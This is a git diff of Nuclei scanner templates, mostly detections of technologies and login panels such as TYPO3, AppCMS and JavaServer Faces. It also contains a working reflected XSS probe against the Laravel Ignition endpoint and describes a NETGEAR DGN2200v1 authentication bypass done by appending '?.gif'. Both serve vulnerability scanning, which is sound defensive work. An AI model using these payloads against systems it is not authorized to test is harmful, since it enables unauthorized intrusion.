- type: word
part: body
words:
- '<title>netdata dashboard</title>'
- type: status
status:
- 200

View File

@ -0,0 +1,28 @@
id: openbmcs-detect
info:
name: openbmcs-detect
author: ffffffff0x
severity: info
tags: openbmcs,detect
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BMS - Login'
- 'Copyright all rights reserved by Open BMCS'
- 'OpenBMCS does not support Internet Explorer'
condition: or
- type: status
status:
- 200

View File

@ -1,9 +1,10 @@
id: strapi-documentation id: strapi-documentation
info: info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public) name: Strapi Documentation
author: idealphase author: idealphase
severity: info severity: info
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
tags: strapi,panel tags: strapi,panel
requests: requests:

View File

@ -0,0 +1,26 @@
id: typo3-login
info:
name: TYPO3 Login Detect
author: dadevel
severity: info
tags: panel,typo3
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TYPO3 CMS"
- "typo3-login-form"
- "TYPO3 SVN ID:"
condition: or
- type: status
status:
- 200

View File

@ -1,7 +1,7 @@
id: honeywell-scada-config id: honeywell-scada-config
info: info:
name: Honeywell Scada System Information Disclosure name: Honeywell Scada System Information Disclosure
author: alperenkesk author: alperenkesk
severity: low severity: low
reference: https://www.exploit-db.com/exploits/44734 reference: https://www.exploit-db.com/exploits/44734

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@ -27,7 +27,7 @@ file:
- type: regex - type: regex
# Investigate for possible SQL Injection # Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id"); # Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array($user_id)); # Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
regex: regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace' - '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
- type: regex - type: regex

View File

@ -4,7 +4,7 @@ info:
name: JavaMelody Monitoring Exposed name: JavaMelody Monitoring Exposed
author: dhiyaneshDK,thomas_from_offensity author: dhiyaneshDK,thomas_from_offensity
severity: medium severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session. description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
reference: reference:
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/ - https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security - https://github.com/javamelody/javamelody/wiki/UserGuide#16-security

View File

@ -4,7 +4,7 @@ info:
name: Prometheus targets API endpoint name: Prometheus targets API endpoint
author: geeknik author: geeknik
severity: info severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge. description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus tags: prometheus

View File

@ -4,7 +4,7 @@ info:
name: Detect Springboot Thread Dump page name: Detect Springboot Thread Dump page
author: philippedelteil author: philippedelteil
severity: low severity: low
description: The threaddump endpoint provides a thread dump from the applications JVM. description: The threaddump endpoint provides a thread dump from the application's JVM.
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
tags: springboot tags: springboot

View File

@ -15,6 +15,6 @@ requests:
matchers: matchers:
- type: word - type: word
words: words:
- '<h1 class="headline">Uh oh. That page doesn\t exist.</h1>'
- 'This page is reserved for artistic dogs.' - 'This page is reserved for artistic dogs.'
- '<h1 class="headline">Uh oh. That page doesnt exist.</h1>'
condition: and condition: and

View File

@ -2,7 +2,7 @@ id: shopify-takeover
info: info:
name: shopify takeover detection name: shopify takeover detection
author: pdteam author: pdteam,philippedelteil
severity: high severity: high
tags: takeover tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -27,3 +27,5 @@ requests:
- type: dsl - type: dsl
dsl: dsl:
- '!contains(host,"myshopify.com")' - '!contains(host,"myshopify.com")'
- '!contains(host,"shopify.com")'
condition: and

View File

@ -0,0 +1,30 @@
id: appcms-detect
info:
name: AppCms Detect
author: princechaddha
severity: info
tags: tech,appcms
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '<!-- Powerd by AppCMS (.*) -->'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<!-- Powerd by AppCMS (.*) -->'

View File

@ -2,10 +2,10 @@ id: jsf-detection
info: info:
name: JavaServer Faces Detection name: JavaServer Faces Detection
author: Moritz Nentwig author: brenocss,Moritz Nentwig
severity: info severity: info
description: Searches for JavaServer Faces content on a URL. description: Searches for JavaServer Faces content on a URL.
tags: jsf,tech tags: jsf,tech,primefaces,richfaces
requests: requests:
- method: GET - method: GET
@ -14,9 +14,23 @@ requests:
redirects: true redirects: true
max-redirects: 2 max-redirects: 2
matchers-condition: or
matchers: matchers:
- type: word - type: dsl
words: name: javafaces
- "javax.faces.resource" dsl:
- "javax.faces.ViewState" - "(contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState'))"
condition: or
- type: dsl
name: primefaces
dsl:
- "contains(body, 'primefaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and
- type: dsl
name: richfaces
dsl:
- "contains(body, 'richfaces')"
- "contains(body, 'javax.faces.resource') || contains(body, 'javax.faces.ViewState')"
condition: and

View File

@ -0,0 +1,35 @@
id: metatag-cms
info:
name: Metatag CMS Detection
author: dadevel
severity: info
description: Generic CMS Detection using html meta generator tag
reference: https://www.w3schools.com/tags/att_meta_name.asp
tags: tech,cms
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'text/html'
- type: regex
part: body
regex:
- '(?i)<meta\s+?name="?generator"?\s+?content="[^"]+?"'
extractors:
- type: regex
part: body
group: 1
regex:
- '(?i)<meta\s+?name="?generator"?\s+?content="([^"]+?)"'

View File

@ -0,0 +1,30 @@
id: typo3-detect
info:
name: TYPO3 Detection
author: dadevel
severity: info
metadata:
shodan-query: http.component:"TYPO3"
tags: tech,typo3
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: or
matchers:
- type: word
part: header
case-insensitive: true
words:
- 'X-TYPO3-Parsetime:'
- type: word
part: body
words:
- '<meta name="generator" content="TYPO3'

View File

@ -0,0 +1,31 @@
id: laravel-ignition-xss
info:
name: Laravel Ignition XSS
author: 0x_Akoko
severity: medium
reference:
- https://www.acunetix.com/vulnerabilities/web/laravel-ignition-reflected-cross-site-scripting/
- https://github.com/facade/ignition/issues/273
tags: laravel,xss,ignition
requests:
- method: GET
path:
- "{{BaseURL}}/_ignition/scripts/--><svg%20onload=alert(document.domain)>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Undefined index: --><svg onload=alert(document.domain)> in file"
- type: status
status:
- 500
- type: word
part: header
words:
- "text/html"

View File

@ -4,7 +4,7 @@ info:
name: NETGEAR DGN2200v1 Router Authentication Bypass name: NETGEAR DGN2200v1 Router Authentication Bypass
author: gy741 author: gy741
severity: high severity: high
description: NETGEAR DGN2200v1 Router does not require authentication if a page has “.jpg”, “.gif”, or “ess_” substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., “?.gif”). description: NETGEAR DGN2200v1 Router does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings, however matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring (e.g., "?.gif").
reference: reference:
- https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
- https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1

View File

@ -1,7 +1,7 @@
id: wordpress-affiliatewp-log id: wordpress-affiliatewp-log
info: info:
name: WordPress Plugin "AffiliateWP Allowed Products" Log Disclosure name: WordPress Plugin "AffiliateWP -- Allowed Products" Log Disclosure
author: dhiyaneshDK author: dhiyaneshDK
severity: low severity: low
tags: wordpress,log,plugin tags: wordpress,log,plugin

View File

@ -1,7 +1,7 @@
id: wp-vault-local-file-inclusion id: wp-vault-local-file-inclusion
info: info:
name: WP Vault 0.8.6.6 Local File Inclusion name: WP Vault 0.8.6.6 Local File Inclusion
author: 0x_Akoko author: 0x_Akoko
severity: high severity: high
reference: https://www.exploit-db.com/exploits/40850 reference: https://www.exploit-db.com/exploits/40850